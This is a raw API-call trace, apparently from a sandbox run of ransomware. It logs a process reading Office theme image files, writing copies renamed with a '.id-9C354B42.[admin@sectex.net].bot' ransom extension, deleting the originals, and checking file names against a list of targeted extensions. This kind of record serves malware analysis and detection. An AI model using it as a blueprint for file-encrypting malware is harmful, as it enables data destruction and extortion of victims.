	[0044.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0044.721] GetLastError () returned 0x0
	[0044.721] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x2d35, lpOverlapped=0x0) returned 1
	[0044.800] WriteFile (in: hFile=0x1f8, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x2d40, lpOverlapped=0x0) returned 1
	[0044.803] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.803] WriteFile (in: hFile=0x1f8, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.803] SetEndOfFile (hFile=0x1f8) returned 1
	[0044.803] CloseHandle (hObject=0x1f8) returned 1
	[0044.803] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.803] SetEndOfFile (hFile=0x1fc) returned 1
	[0044.804] CloseHandle (hObject=0x1fc) returned 1
	[0044.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.804] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 1
	[0044.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.804] lstrlenW (lpString=".doc") returned 4
	[0044.804] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.805] lstrlenW (lpString=".docx") returned 5
	[0044.805] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.805] lstrlenW (lpString=".pdf") returned 4
	[0044.805] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.805] lstrlenW (lpString=".xls") returned 4
	[0044.805] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.805] lstrlenW (lpString=".xlsx") returned 5
	[0044.805] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.805] lstrlenW (lpString=".ppt") returned 4
	[0044.805] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.805] lstrlenW (lpString=".zip") returned 4
	[0044.805] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.805] lstrlenW (lpString=".rar") returned 4
	[0044.805] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.805] lstrlenW (lpString=".bz2") returned 4
	[0044.805] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.805] lstrlenW (lpString=".7z") returned 3
	[0044.805] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.805] lstrlenW (lpString=".dbf") returned 4
	[0044.805] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.805] lstrlenW (lpString=".1cd") returned 4
	[0044.805] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.805] lstrlenW (lpString=".jpg") returned 4
	[0044.805] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.805] lstrlenW (lpString=".doc") returned 4
	[0044.805] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.805] lstrlenW (lpString=".docx") returned 5
	[0044.806] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.806] lstrlenW (lpString=".pdf") returned 4
	[0044.806] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.806] lstrlenW (lpString=".xls") returned 4
	[0044.806] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.806] lstrlenW (lpString=".xlsx") returned 5
	[0044.806] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.806] lstrlenW (lpString=".ppt") returned 4
	[0044.806] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.806] lstrlenW (lpString=".zip") returned 4
	[0044.806] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.806] lstrlenW (lpString=".rar") returned 4
	[0044.806] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.806] lstrlenW (lpString=".bz2") returned 4
	[0044.806] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.806] lstrlenW (lpString=".7z") returned 3
	[0044.806] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.806] lstrlenW (lpString=".dbf") returned 4
	[0044.806] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.806] lstrlenW (lpString=".1cd") returned 4
	[0044.806] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76
	[0044.806] lstrlenW (lpString=".jpg") returned 4
	[0044.806] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.806] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.806] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0044.807] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2574) returned 1
	[0044.807] CloseHandle (hObject=0x1fc) returned 1
	[0044.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 0x20
	[0044.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0044.807] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.807] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.130] GetLastError () returned 0x0
	[0045.130] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0xa0e, lpOverlapped=0x0) returned 1
	[0045.131] WriteFile (in: hFile=0x214, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xa10, lpOverlapped=0x0) returned 1
	[0045.132] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.132] WriteFile (in: hFile=0x214, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.132] SetEndOfFile (hFile=0x214) returned 1
	[0045.132] CloseHandle (hObject=0x214) returned 1
	[0045.133] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.133] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.133] CloseHandle (hObject=0x1fc) returned 1
	[0045.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.134] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 1
	[0045.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.134] lstrlenW (lpString=".doc") returned 4
	[0045.134] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.134] lstrlenW (lpString=".docx") returned 5
	[0045.134] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.134] lstrlenW (lpString=".pdf") returned 4
	[0045.134] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.134] lstrlenW (lpString=".xls") returned 4
	[0045.134] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.134] lstrlenW (lpString=".xlsx") returned 5
	[0045.134] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.134] lstrlenW (lpString=".ppt") returned 4
	[0045.134] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.134] lstrlenW (lpString=".zip") returned 4
	[0045.134] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.134] lstrlenW (lpString=".rar") returned 4
	[0045.134] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.134] lstrlenW (lpString=".bz2") returned 4
	[0045.134] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.134] lstrlenW (lpString=".7z") returned 3
	[0045.134] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.135] lstrlenW (lpString=".dbf") returned 4
	[0045.135] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.135] lstrlenW (lpString=".1cd") returned 4
	[0045.135] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.135] lstrlenW (lpString=".jpg") returned 4
	[0045.135] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.135] lstrlenW (lpString=".doc") returned 4
	[0045.135] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.135] lstrlenW (lpString=".docx") returned 5
	[0045.135] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.135] lstrlenW (lpString=".pdf") returned 4
	[0045.135] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.135] lstrlenW (lpString=".xls") returned 4
	[0045.135] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.135] lstrlenW (lpString=".xlsx") returned 5
	[0045.135] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.135] lstrlenW (lpString=".ppt") returned 4
	[0045.135] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.135] lstrlenW (lpString=".zip") returned 4
	[0045.135] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.135] lstrlenW (lpString=".rar") returned 4
	[0045.135] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.135] lstrlenW (lpString=".bz2") returned 4
	[0045.135] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.135] lstrlenW (lpString=".7z") returned 3
	[0045.135] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.135] lstrlenW (lpString=".dbf") returned 4
	[0045.135] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.136] lstrlenW (lpString=".1cd") returned 4
	[0045.136] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75
	[0045.136] lstrlenW (lpString=".jpg") returned 4
	[0045.136] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.136] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0045.136] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0045.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.136] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1339) returned 1
	[0045.136] CloseHandle (hObject=0x1fc) returned 1
	[0045.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 0x20
	[0045.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.137] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.137] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0045.138] GetLastError () returned 0x0
	[0045.138] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x53b, lpOverlapped=0x0) returned 1
	[0045.140] WriteFile (in: hFile=0x218, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x540, lpOverlapped=0x0) returned 1
	[0045.141] ReadFile (in: hFile=0x1fc, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.141] WriteFile (in: hFile=0x218, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.141] SetEndOfFile (hFile=0x218) returned 1
	[0045.141] CloseHandle (hObject=0x218) returned 1
	[0045.141] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.141] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.142] CloseHandle (hObject=0x1fc) returned 1
	[0045.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.142] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 1
	[0045.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.143] lstrlenW (lpString=".doc") returned 4
	[0045.143] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.143] lstrlenW (lpString=".docx") returned 5
	[0045.143] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.143] lstrlenW (lpString=".pdf") returned 4
	[0045.143] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.143] lstrlenW (lpString=".xls") returned 4
	[0045.143] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.143] lstrlenW (lpString=".xlsx") returned 5
	[0045.143] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.143] lstrlenW (lpString=".ppt") returned 4
	[0045.143] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.143] lstrlenW (lpString=".zip") returned 4
	[0045.143] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.143] lstrlenW (lpString=".rar") returned 4
	[0045.143] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.143] lstrlenW (lpString=".bz2") returned 4
	[0045.143] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.143] lstrlenW (lpString=".7z") returned 3
	[0045.143] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.143] lstrlenW (lpString=".dbf") returned 4
	[0045.143] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.143] lstrlenW (lpString=".1cd") returned 4
	[0045.143] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.143] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.143] lstrlenW (lpString=".jpg") returned 4
	[0045.144] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.144] lstrlenW (lpString=".doc") returned 4
	[0045.144] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.144] lstrlenW (lpString=".docx") returned 5
	[0045.144] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.144] lstrlenW (lpString=".pdf") returned 4
	[0045.144] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.144] lstrlenW (lpString=".xls") returned 4
	[0045.144] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.144] lstrlenW (lpString=".xlsx") returned 5
	[0045.144] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.144] lstrlenW (lpString=".ppt") returned 4
	[0045.144] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.144] lstrlenW (lpString=".zip") returned 4
	[0045.144] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.144] lstrlenW (lpString=".rar") returned 4
	[0045.144] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.144] lstrlenW (lpString=".bz2") returned 4
	[0045.144] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.144] lstrlenW (lpString=".7z") returned 3
	[0045.144] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.144] lstrlenW (lpString=".dbf") returned 4
	[0045.144] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.144] lstrlenW (lpString=".1cd") returned 4
	[0045.144] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75
	[0045.144] lstrlenW (lpString=".jpg") returned 4
	[0045.144] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.145] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0045.145] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0045.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.146] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=16738) returned 1
	[0045.146] CloseHandle (hObject=0x214) returned 1
	[0045.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 0x20
	[0045.146] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
